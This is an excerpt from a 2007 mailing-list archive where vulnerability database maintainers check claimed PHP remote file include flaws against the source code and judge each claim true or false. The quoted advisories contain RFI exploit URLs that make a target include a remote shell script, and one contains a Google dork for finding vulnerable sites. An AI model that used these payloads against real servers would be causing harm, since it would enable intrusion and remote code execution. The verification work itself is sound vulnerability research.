< else $Values[$col] = "`$col` = '".addslashes($val)."'";
---
> $Values[$col] = "`$col` = ".escape_sqlData($val);

... AND MANY OTHER FILES ... who knows which vectors are actually vulnerable ...

And the finale:

diff -r flip-rc2/web/core/core.utils.php flip-rc3/web/core/core.utils.php
> /**
> * Setzt den String escaped in Hochkommata, falls er nicht numerisch ist
> *
> * @since 1345 - 24.01.2007
> * @param String $sqlvalue Dieser Text wird (sql-)gesichert
> * @return String
> */
> function escape_sqlData($sqlvalue) {
...
> function implode_sql($glue, $array) {
...
> function implode_sqlIn($array) {

So, obviously these functions couldn't be vulnerable if they didn't exist in RC2.

- Steve

From coley at linus.mitre.org Sat Feb 3 17:12:21 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sat, 3 Feb 2007 17:12:21 -0500 (EST)
Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
In-Reply-To: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com>
References: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com>
Message-ID:

On Thu, 1 Feb 2007, str0ke wrote:

> The program is vulnerable: $config[sipssys] is the first line of code
> in the file box.inc.php.

Also, this is a rediscovery - CVE-2006-4733, posted to Bugtraq by ThE__LeO in Sep 2006, although that one only claimed 0.2.2.

- Steve

From coley at linus.mitre.org Sat Feb 3 17:30:29 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sat, 3 Feb 2007 17:30:29 -0500 (EST)
Subject: [VIM] PHP interpreter problems and blaming the victim - GLOBALS etc.
In-Reply-To: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com>
References: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com>
Message-ID:

On Thu, 1 Feb 2007, str0ke wrote:

> The first line of code contains.
>
> require_once($GLOBALS['core']['module_path'].'/module_common.php');

OK, I'm starting to get a little worried about this trend of hacking GLOBALS, SERVER, SESSION, FILES, etc. from a VDB perspective.

Really, what chance does any application have against a GLOBALS overwrite when it's a PHP bug itself? If there's no chance - then should we be flagging these apps in VDB's?

According to Stefan Esser -

"Unfortunately the register_globals mode of PHP was not protected at all against overwriting GLOBALS from the outside until PHP 4.3.11 and this protection had a hole before PHP 4.4.1, which means when register_globals is turned on in PHP versions before 4.4.1 it is possible to exploit code sequences like the one found above... PHP4 >= 4.4.1 adds checks to extract() and import_request_variables() to protect them against overwriting the $GLOBALS variable. This however does not protect against applications that use their own routines to globalize ... [such as $$varname = $value]"

For PHP 5, he says

"In PHP5 the $GLOBALS array is implemented as a real superglobal, that is registered before anything else is added to the main symbol table. This means, when it is overwritten in PHP5 it has a different impact on the application, than in PHP4. Because it is registered before the request variables are parsed and because there was no (or better no working) protection in PHP <= 5.0.5 it was possible to overwrite $GLOBALS from the outside when register_globals is turned on, or extract() or import_request_variables() were used in an unsafe way.
The major difference between the impact on PHP4 and PHP5 is, that due to the real superglobals nature of $GLOBALS the overwrite will not only be visible in the scope where it happened, but in all scopes."

http://www.hardened-php.net/globals-problem

Now, from a sploit standpoint, I can see how this kind of issue is still worth tracking, because no doubt there are many active environments out there using vulnerable PHP versions. But flagging these apps for GLOBALS problems (and, presumably, other superglobals overwrites) seems incorrect to me. Operationally it's important, since if you're a consumer and your app uses GLOBALS, you want to know; but CVE and some other vdb's won't distinguish between every product that uses a vulnerable zlib, for example.

I don't recall there being other major programming language bugs in the past that introduced vulnerabilities that could not be defended against. The Perl format string issue only existed if your program had user-injected format strings (which I still think is important even though it's not for code execution). I suspect that some XSS also stems from the PHP "XSS in error message" problem, and then you've also got the unset() issue.

This seems to be making things very messy. Thoughts? Anybody know the status of other superglobals like FILE and SESSION?

- Steve

From coley at mitre.org Wed Feb 7 00:44:29 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 7 Feb 2007 00:44:29 -0500 (EST)
Subject: [VIM] true: Categories hierarchy class_template.php RFI
Message-ID: <200702070544.l175iT4Y024993@faron.mitre.org>

Leave it to str0ke to boil down subject lines to true/false. Plagiarism is the sincerest form of flattery, dude.

*ahem* anyway...

Researcher: xoron
Ref: http://www.milw0rm.com/exploits/3270

In the URL download provided, the first line in class_template.php is:

include($phpbb_root_path . 'includes/template.' . $phpEx);

- Steve

From coley at mitre.org Wed Feb 7 01:02:00 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 7 Feb 2007 01:02:00 -0500 (EST)
Subject: [VIM] true w/caveat: GeekLog glConf[path_libraries] RFI
Message-ID: <200702070602.l17620IA025275@faron.mitre.org>

Researcher: GolD_M(Mahmnood_ali)
Ref: http://www.milw0rm.com/exploits/3267

In the Geeklog distribution, we have the following from Geeklog-2.x/system/libraries/Geeklog/MVCnPHP/BaseView.php:

require $glConf['path_libraries'] . 'Geeklog/MVCnPHP/ViewInterface.php';

which is the first statement.

However, this comes from some package called "MVCnPHP" which has some close relationship with Geeklog but is separate:

http://freshmeat.net/projects/mvcnphp/

which says "MVCnPHP stands for Model-View-Controller in PHP. It is an implementation of the MVC design pattern for use in PHP applications."

... and downloading 3.0.0 of this MVCnPHP produces a BaseView.php which, upon removing spaces and CRLF inconsistencies, is exactly the same as that which is in Geeklog.

So we can add this to our list of modules whose ease-of-integration makes opportunities for ease-of-exploitation. Whether the blame lies with Geeklog or MVCnPHP is not immediately clear.

- Steve

From str0ke at milw0rm.com Wed Feb 7 09:54:23 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 08:54:23 -0600
Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln.
Message-ID: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com>

line 18: if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php")
line 20: include($plugins_path . "plugins/" . $plugin ."/plugin.php");

Not vulnerable.

/str0ke

################################################################################################
#
# Title : PhotoStand (plugins.php) Remote File Include Vuln.
# Author : Gokhan
# DownLoad : http://www.comscripts.com/jump.php?action=script&id=1864
# Contact : gokhankaya at hotmail.com | msn at bl4ster.net
#
# Vuln Code : includes/functions/plugins.php
#
# include($plugins_path . "plugins/" . $plugin ."/plugin.php");
#
# Exploit : http://site/path/includes/functions/plugins.php?plugins_path=http://sh3ll
#
################################################################################################
#
# GreetZ: BLaCKWHITE, CanberX, LGMAN, HackerBox.Eu, str0ke
#
#################################################################################################

From str0ke at milw0rm.com Wed Feb 7 10:20:00 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 09:20:00 -0600
Subject: [VIM] true: agermenu
Message-ID: <814b9d50702070720rc1c9af9n2f6161e7b1fb0d71@mail.gmail.com>

line 26: include $rootdir."inc/agermenu.func.php";

/str0ke

===============================================================
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit:
v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================

From str0ke at milw0rm.com Wed Feb 7 10:27:28 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 09:27:28 -0600
Subject: [VIM] false: Phpwebsite 1.0.0 File Include Vulnerability
Message-ID: <814b9d50702070727k59783edbycc373895d8a8c9a2@mail.gmail.com>

The error section pretty much explains it all.
/str0ke

-------------------------------------********************----------------------------------------------------------
#Title : Phpwebsite 1.0.0 {/inc/functions.php} File İnclude Vulnerability
#S.Page : phpwebsite.appstate.edu :)
--------------------------------------*******************-----------------------------------------------------------

[[Error]]

$file = sprintf('Compat/Function/%s.php', $function);
if ((@include_once $file) !== false) {
return true;
}
}
return false;
}

[[Error]]

[[RFI]]
http://[target]/[path]/inc/functions.php?file=[Shell]

From str0ke at milw0rm.com Wed Feb 7 10:34:35 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 09:34:35 -0600
Subject: [VIM] false: OpenBiblio <= 0.5.2(localize.php) Remote File Include Vulnerabilities
Message-ID: <814b9d50702070734q302d49c9pefe69f399c0e1d61@mail.gmail.com>

The file only contains 1 class named Localize.

/str0ke

*Script : OpenBiblio <= version 0.5.2(localize.php) Remote File Include Vulnerabilities
*******************************************************************************
*URL:
*
*http://sourceforge.net/project/showfiles.php?group_id=50071
*******************************************************************************
*
*V.CODE:
In : [path]/classes/localize.php
*
*include($localpath);
*
********************************************************************************
*
*Exploit:
*
*http://www.site.com/{scriptpath}/classes/localize.php?localpath={shellcode}

From str0ke at milw0rm.com Wed Feb 7 11:19:41 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 10:19:41 -0600
Subject: [VIM] false: WebMatic 2.5 Remote File Include Vulnerability
Message-ID: <814b9d50702070819l5e2a5deeic2e7f9085d5a65eb@mail.gmail.com>

WebMatic 2.5
http://www.valarsoft.com/index.php?dpage=pagine&page=downloads&pagID=156&arg_downID=1&sub_downID=1&downID=11&SCARICA=si

P_LIB is initialized.

line 6: require("core/lib.php");
line 7: require($P_LIB."lib_chat.php");

core/lib.php
line 8: $P_LIB="core/";

/str0ke

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.5 Remote File Include Vulnerability
#S.Page : php.arsivimiz.com/goster/504 :)
# easier link:
--------------------------------------*******************-----------------------------------------------------------

Error : require($P_LIB."lib_chat.php");

[[RFI]]
http://[target]/[path]/chat.php?P_LIB=[Shell]
Example : [Path]/chat.php?P_LIB=http://[path]/shell.txt
[[/RFI]]

From str0ke at milw0rm.com Wed Feb 7 12:18:54 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 11:18:54 -0600
Subject: [VIM] true: WebMatic 2.6 RFI
Message-ID: <814b9d50702070918m3972ce9fk2f2c00be7eeec332@mail.gmail.com>

Pretty much the first line is $P_LIB so it is vulnerable.

/str0ke

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6
#Author : MadNet
#Contact : MadNet[at]Hackertr[Dot]org
#S.Page : www.valarsoft.com :)
--------------------------------------*******************-----------------------------------------------------------

Error1 : require($P_LIB."lib_album.php");
Error2 : require($P_INDEX."page_album.inc");

[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
-------------------------------------------------
Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
-- MadNet From Turkey & Cyber-Sabotger Orgeneral --
--Thanks Milw0rm
--Milw0rm.com [2007-02-07]

From coley at linus.mitre.org Wed Feb 7 12:50:14 2007
From: coley at linus.mitre.org (Steven M.
Christey)
Date: Wed, 7 Feb 2007 12:50:14 -0500 (EST)
Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln.
In-Reply-To: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com>
References: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com>
Message-ID:

On Wed, 7 Feb 2007, str0ke wrote:

> line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php")
>
> line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php");
>
> Not vulnerable.

If $plugins_path or $plugin are attacker-controlled, then are they subject to ".." or "/abs/path" traversal attacks?

- Steve

From str0ke at milw0rm.com Wed Feb 7 13:28:35 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 12:28:35 -0600
Subject: [VIM] false: PhotoStand (plugins.php) Remote File Include Vuln.
In-Reply-To:
References: <814b9d50702070654y25e07087k3b6ca1d90e64c2c3@mail.gmail.com>
Message-ID: <814b9d50702071028v76b6735h791690efb714b209@mail.gmail.com>

$open_plugins = opendir($plugins_path . "plugins/");

// Read plugins directory
while ($plugin = readdir($open_plugins)){

###########################

the while loop would end if plugins_path isn't a directory. Which it seems is the only variable that you can play with :(

/str0ke

On 2/7/07, Steven M. Christey wrote:
>
> On Wed, 7 Feb 2007, str0ke wrote:
>
> > line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php")
> >
> > line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php");
> >
> > Not vulnerable.
>
> If $plugins_path or $plugin are attacker-controlled, then are they subject
> to ".." or "/abs/path" traversal attacks?
>
> - Steve
>

From str0ke at milw0rm.com Wed Feb 7 15:56:45 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 14:56:45 -0600
Subject: [VIM] false: Agermenu 0.03
Message-ID: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com>

$rootdir is defined on the top line of index.php and the rest.

/str0ke

Name: Agermenu 0.03 - Remote File Include Vulnerability
Script: http://www.chbs.dk/proj/agermenu/agermenu-0.03.tgz
*****************
ERROR:
index.php -> include $rootdir."inc/top.inc.php"; (line 4)
index.php -> include $rootdir."inc/bottom.inc.php"; (line 24)
about/contribute.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5)
about/contribute.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 32)
**************************************************************************************
about/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5)
about/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 20)
**************************************************************************************
about/using.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5 , 50)
about/using.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 67, 78)
**************************************************************************************
about/licenses/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5)
about/licenses/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 30)
**************************************************************************************
kvastmo/index.php?rootdir=[shell] -> include $rootdir."inc/top.inc.php"; (line 5)
kvastmo/index.php?rootdir=[shell] -> include $rootdir."inc/bottom.inc.php"; (line 39)
**************************************************************************************
And more .. almost all files have the include $rootdir ;) for the rest download the script (above)
**************************************************************************************
RFI:
http://www.SITE.com/path/index.php?rootdir=[shell]
http://www.SITE.com/path/about/contribute.php?rootdir=[shell]
http://www.SITE.com/path/about/index.php?rootdir=[shell]
http://www.SITE.com/path/about/using.php?rootdir=[shell]
http://www.SITE.com/path/about/licenses/index.php?rootdir=[shell]
http://www.SITE.com/path/kvastmo/index.php?rootdir=[shell]
**************************************************************************************

From coley at mitre.org Wed Feb 7 16:07:36 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 7 Feb 2007 16:07:36 -0500 (EST)
Subject: [VIM] true: months-old CentiPaid absolute_path RFI
Message-ID: <200702072107.l17L7adG007842@faron.mitre.org>

Researcher: Kw3[R]Ln [ Romanian Security Team ]
Ref: http://www.milw0rm.com/exploits/2555

first line is:

include($absolute_path.'/centipaid/adodb/adodb.inc.php');

NOTE - this is a different vector than OSVDB:31638, which was disputed.

- Steve

From coley at linus.mitre.org Wed Feb 7 18:27:09 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 7 Feb 2007 18:27:09 -0500 (EST)
Subject: [VIM] false: Agermenu 0.03
In-Reply-To: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com>
References: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com>
Message-ID:

FRSIRT:ADV-2007-0512 mentions 0.03 as vulnerable to rootdir in examples/inc/top.inc.php. This vector was published for 0.01 in http://www.milw0rm.com/exploits/3280, a different disclosure than what str0ke just mentioned.

This looks legit for 0.03 too:

examples/inc/top.inc.php

[first mention]
$sysvar_copyright_url=$rootdir."about/licenses/";

...
if (file_exists($rootdir."inc/agermenu.func.php")) {
$agermenufuncfile=$rootdir."inc/agermenu.func.php";
}

# The new default place (from version 0.03) for
# the agermenu.func.php file
if (file_exists($rootdir."agermenu/agermenu.func.php")) {
$agermenufuncfile=$rootdir."agermenu/agermenu.func.php";
}

# Only include if the agermenu.func.php file exists
if (file_exists($agermenufuncfile)) {
include $agermenufuncfile;

- Steve

From str0ke at milw0rm.com Wed Feb 7 20:53:19 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 19:53:19 -0600
Subject: [VIM] false: Agermenu 0.03
In-Reply-To:
References: <814b9d50702071256v4bc35b7bod4f6b2adaa1d389e@mail.gmail.com>
Message-ID: <814b9d50702071753s40d720bay98c283f56197cd6f@mail.gmail.com>

local inclusion looks good to go.

if (file_exists($agermenufuncfile)) {
include $agermenufuncfile;

/str0ke

On 2/7/07, Steven M. Christey wrote:
>
> FRSIRT:ADV-2007-0512 mentions 0.03 as vulnerable to rootdir in
> examples/inc/top.inc.php. This vector was published for 0.01 in
> http://www.milw0rm.com/exploits/3280, a different disclosure than what
> str0ke just mentioned.
>
> This looks legit for 0.03 too:
>
> examples/inc/top.inc.php
>
> [first mention]
> $sysvar_copyright_url=$rootdir."about/licenses/";
>
> ...
>
> if (file_exists($rootdir."inc/agermenu.func.php")) {
> $agermenufuncfile=$rootdir."inc/agermenu.func.php";
> }
>
> # The new default place (from version 0.03) for
> # the agermenu.func.php file
> if (file_exists($rootdir."agermenu/agermenu.func.php")) {
> $agermenufuncfile=$rootdir."agermenu/agermenu.func.php";
> }
>
> # Only include if the agermenu.func.php file exists
> if (file_exists($agermenufuncfile)) {
> include $agermenufuncfile;
>
>
> - Steve
>

From str0ke at milw0rm.com Wed Feb 7 21:20:16 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 7 Feb 2007 20:20:16 -0600
Subject: [VIM] true: Agermenu 0.03
Message-ID: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com>

First line of code reads

include($path_to_folder.'classes/class.phpmailer.php');

/str0ke

*****************
Found by Denven *
*****************
*****************
*****************
Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php : include($path_to_folder.'classes/class.phpmailer.php');
**************************************************************************** **********
RFI:
http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]
**************************************************************************** **********
denven[at]gmail[dot]com

From coley at linus.mitre.org Thu Feb 8 11:34:09 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 8 Feb 2007 11:34:09 -0500 (EST)
Subject: [VIM] true: Agermenu 0.03
In-Reply-To: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com>
References: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com>
Message-ID:

On Wed, 7 Feb 2007, str0ke wrote:

> First line of code reads
>
> include($path_to_folder.'classes/class.phpmailer.php');

I assume in this case you meant Maian Recipe, not Agermenu :)

- Steve

> *****************
> Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
> *****************
> Google Dork: "Powered by Maian Recipe v1.0"
> *****************

From str0ke at milw0rm.com Thu Feb 8 11:44:00 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 8 Feb 2007 10:44:00 -0600
Subject: [VIM] true: Agermenu 0.03
In-Reply-To:
References: <814b9d50702071820g111a510fo24154b50e31c4fe7@mail.gmail.com>
Message-ID: <814b9d50702080844g481e1207g2de228737b0c8156@mail.gmail.com>

Oops, he sent in the other vulnerability with Agermenu as the title. Missed that mistake.

Maian Recipe v1.0

/str0ke

On 2/8/07, Steven M. Christey wrote:
>
> On Wed, 7 Feb 2007, str0ke wrote:
>
> > First line of code reads
> >
> > include($path_to_folder.'classes/class.phpmailer.php');
>
>
> I assume in this case you meant Maian Recipe, not Agermenu :)
>
> - Steve
>
> > *****************
> > Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
> > *****************
> > Google Dork: "Powered by Maian Recipe v1.0"
> > *****************
>

From str0ke at milw0rm.com Thu Feb 8 11:49:36 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 8 Feb 2007 10:49:36 -0600
Subject: [VIM] false: News-Maniac Remote File Include Vulnerability
Message-ID: <814b9d50702080849u4bf7d792le5f1226fa3a5bf24@mail.gmail.com>

The file only contains defines and a class that is never used.
/str0ke

##############################################################
#News-Maniac Remote File Include Vulnerability
#Download : http://sourceforge.net/projects/news-maniac/
#Bug: include($compile_path)
###############################################################
#
#Exploit
#
#[path]/smarty/Smarty.class.php?compile_path=[Evil Scripts]
#

From str0ke at milw0rm.com Thu Feb 8 12:13:42 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 8 Feb 2007 11:13:42 -0600
Subject: [VIM] false: Tritanium Bulletin Board 2 version #2005-05-02-18-17-06 Remote File Inclusion Exploit
Message-ID: <814b9d50702080913h23c67dcmabb89792288342e6@mail.gmail.com>

Piece of the exploit code:

=>$Path.'misc/update_tbb1/update_tbb1.php?LANGUAGE_PATH='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

First 3 lines of code.

> require_once('startup.php');
> $LANGUAGE_PATH = 'languages/'.$CONFIG['standard_language'];
> include($LANGUAGE_PATH.'/lng_main.php');

Seems there isn't a startup.php file in the update_tbb1 directory, which in newer versions of php would just die right after the first line. If you get past the require line you could take over $CONFIG['standard_language']. Even local inclusion isn't possible without a languages folder existing in the current directory. So pretty much the script isn't vulnerable to a remote/local inclusion attack.

/str0ke

From coley at mitre.org Sun Feb 11 02:36:51 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sun, 11 Feb 2007 02:36:51 -0500 (EST)
Subject: [VIM] FreeRADIUS dispute of CVE-2007-0080
Message-ID: <200702110736.l1B7apwM021640@faron.mitre.org>

Received this via email.

http://www.freeradius.org/security.html

"2007.01.02 - SMB_Handle_Type SMB_Connect_Server. While the summary is superficially correct, and there is a stack overflow in rlm_smb, the issue is less problematic than it sounds... In summary, the issue is not remotely exploitable. It is exploitable by local administrators who have write access to the server configuration files. If an attacker can write to the server configuration files, they can configure the server to run arbitrary programs. Exploiting the server via a stack overflow would be unnecessary."

The vendor mentions that some VDB's haven't updated their records yet.

- Steve

From coley at mitre.org Mon Feb 12 16:50:41 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 12 Feb 2007 16:50:41 -0500 (EST)
Subject: [VIM] CVE dispute - old Somery team.php RFI
Message-ID: <200702122150.l1CLofGO018782@faron.mitre.org>

Researcher: SpC-x
Ref: BID:18412, OSVDB:27662
Raw source: http://www.root-security.org/danger/Somery.txt (now 404)
Alternate: http://packetstorm.linuxsecurity.com/0606-exploits/Somery.txt

Claimed vectors: team.php?checkauth

The original advisory provides enough context:

# include("system/include.php");
# if ($checkauth) {
...
# http://www.victim.com/Somery/team.php?checkauth=Command-Shell

Obviously since $checkauth is in a conditional, RFI existence is highly suspicious. Just to be sure, I downloaded 0.4.4 and grepped for "checkauth" in the whole product, and it's only used in conditionals (when it's not being set to 1 or 0, that is).

- Steve

From str0ke at milw0rm.com Mon Feb 12 17:19:16 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 12 Feb 2007 16:19:16 -0600
Subject: [VIM] false: drakecms 0.3.2beta (header.php) Remote File Inclusion Vulnerability
Message-ID: <814b9d50702121419h7ba90b28gbc21f9dfc07c5f58@mail.gmail.com>

First line of code.

Hi,

The vulnerability is there... pValid simply verifies that the page you requested is the page being displayed, so I need to call my malware the same as status.php or any of the other files found to be linked inside the PHP.

$p = $_REQUEST['p'];
if( !$p ) $p="$cfg->defaultPage";

$p is not a valid page..."; } ?>

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

-------------- next part --------------
An embedded message was scrubbed...
From: Sebastian Wolfgarten
Subject: [Full-disclosure] Arbitrary file disclosure vulnerability in php rrd browser < 0.2.1 (prb)
Date: Sun, 11 Feb 2007 17:19:09 +0100
Size: 5968
Url: http://www.attrition.org/pipermail/vim/attachments/20070213/dca05f8c/attachment.mht

From noamr at beyondsecurity.com Tue Feb 13 05:08:48 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Tue, 13 Feb 2007 12:08:48 +0200
Subject: [VIM] true: Inertia News Remote File İnclude
Message-ID: <200702131208.48908.noamr@beyondsecurity.com>

Hi,

It looks legit:

require ("$inews_path/inertia_sql_class.php");

No tests done to the value.

Product looks like abandonware (http://www.brentc.com/inertianews/).

---------- Forwarded Message ----------

Subject: Inertia News Remote File İnclude
Date: Monday 12 February 2007 22:55
From: crazy_king at eno7.org
To: bugtraq at securityfocus.com

Version :
0.02 beta

Error :
require ("$inews_path/inertia_sql_class.php");

Exploit :
http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
ell.txt

Eno7.Org - Crazy-King.ORg

Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim

-------------------------------------------------------

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From str0ke at milw0rm.com Tue Feb 13 09:06:45 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 13 Feb 2007 08:06:45 -0600
Subject: [VIM] true: Inertia News Remote File İnclude
In-Reply-To: <200702131208.48908.noamr@beyondsecurity.com>
References: <200702131208.48908.noamr@beyondsecurity.com>
Message-ID: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com>

This was posted up on 12/21/2006.

http://www.milw0rm.com/exploits/2976

/str0ke

On 2/13/07, Noam Rathaus wrote:
> Hi,
>
> It looks legit:
>
>
> require ("$inews_path/inertia_sql_class.php");
>
>
> No tests done to the value.
>
> Product looks like abandonware (http://www.brentc.com/inertianews/).
>
> ---------- Forwarded Message ----------
>
> Subject: Inertia News Remote File İnclude
> Date: Monday 12 February 2007 22:55
> From: crazy_king at eno7.org
> To: bugtraq at securityfocus.com
>
> Version :
> 0.02 beta
>
> Error :
> require ("$inews_path/inertia_sql_class.php");
>
> Exploit :
> http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
> ell.txt
>
> Eno7.Org - Crazy-King.ORg
>
> Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim
>
> -------------------------------------------------------
>
> --
> Noam Rathaus
> CTO
> 1616 Anderson Rd.
> McLean, VA 22102
> Tel: 703.286.7725 extension 105
> Fax: 888.667.7740
> noamr at beyondsecurity.com
> http://www.beyondsecurity.com
>

From ge at linuxbox.org Tue Feb 13 09:07:51 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Tue, 13 Feb 2007 08:07:51 -0600 (CST)
Subject: [VIM] true: Inertia News Remote File İnclude
In-Reply-To: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com>
Message-ID:

On Tue, 13 Feb 2007, str0ke wrote:
> This was posted up on 12/21/2006.
>
> http://www.milw0rm.com/exploits/2976

Any guidelines you want us to follow then when we test stuff and share?

>
> /str0ke
>
> On 2/13/07, Noam Rathaus wrote:
> > Hi,
> >
> > It looks legit:
> >
> >
> > require ("$inews_path/inertia_sql_class.php");
> >
> >
> > No tests done to the value.
> >
> > Product looks like abandonware (http://www.brentc.com/inertianews/).
> >
> > ---------- Forwarded Message ----------
> >
> > Subject: Inertia News Remote File İnclude
> > Date: Monday 12 February 2007 22:55
> > From: crazy_king at eno7.org
> > To: bugtraq at securityfocus.com
> >
> > Version :
> > 0.02 beta
> >
> > Error :
> > require ("$inews_path/inertia_sql_class.php");
> >
> > Exploit :
> > http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
> > ell.txt
> >
> > Eno7.Org - Crazy-King.ORg
> >
> > Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim
> >
> > -------------------------------------------------------
> >
> > --
> > Noam Rathaus
> > CTO
> > 1616 Anderson Rd.
> > McLean, VA 22102
> > Tel: 703.286.7725 extension 105
> > Fax: 888.667.7740
> > noamr at beyondsecurity.com
> > http://www.beyondsecurity.com
> >
>

From str0ke at milw0rm.com Tue Feb 13 09:21:56 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 13 Feb 2007 08:21:56 -0600
Subject: [VIM] true: Inertia News Remote File İnclude
In-Reply-To:
References: <814b9d50702130606x6471a5am7aa358e2fcdcbab3@mail.gmail.com>
Message-ID: <814b9d50702130621p5c6fcac7m832923dd3efa8743@mail.gmail.com>

On 2/13/07, Gadi Evron wrote:
> On Tue, 13 Feb 2007, str0ke wrote:
> > This was posted up on 12/21/2006.
> >
> > http://www.milw0rm.com/exploits/2976
>
> Any guidelines you want us to follow then when we test stuff and share?

Not on my side you guys rock, keep up the good work.

/str0ke

From str0ke at milw0rm.com Tue Feb 13 09:44:36 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 13 Feb 2007 08:44:36 -0600
Subject: [VIM] true: AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit
Message-ID: <814b9d50702130644g6c81ce96o19e3d3f5181d80cf@mail.gmail.com>

First line of code.
include($Root_To_Script.'class.readdir.php');

/str0ke

##################
AT Contenator <= v1.0 (Root_To_Script) Remote File Include Exploit
Script Page:http://contenator.ansatheus.de/
Script Download:http://www.ansatheus.de/_at_contenator/6_Download-Bereich/download/1_Contenator-Sourcen/milestone_Beispielprojekt.zip
Test Page: http://www.xxx.de/_at_contenator/
http://www.xxx.de/_at_contenator/_admin/nav.php?Root_To_Script=http://www.gnlm.com.ar/images/images.txt?

From str0ke at milw0rm.com Tue Feb 13 10:25:26 2007
From: str0ke at milw0rm.com (str0ke)
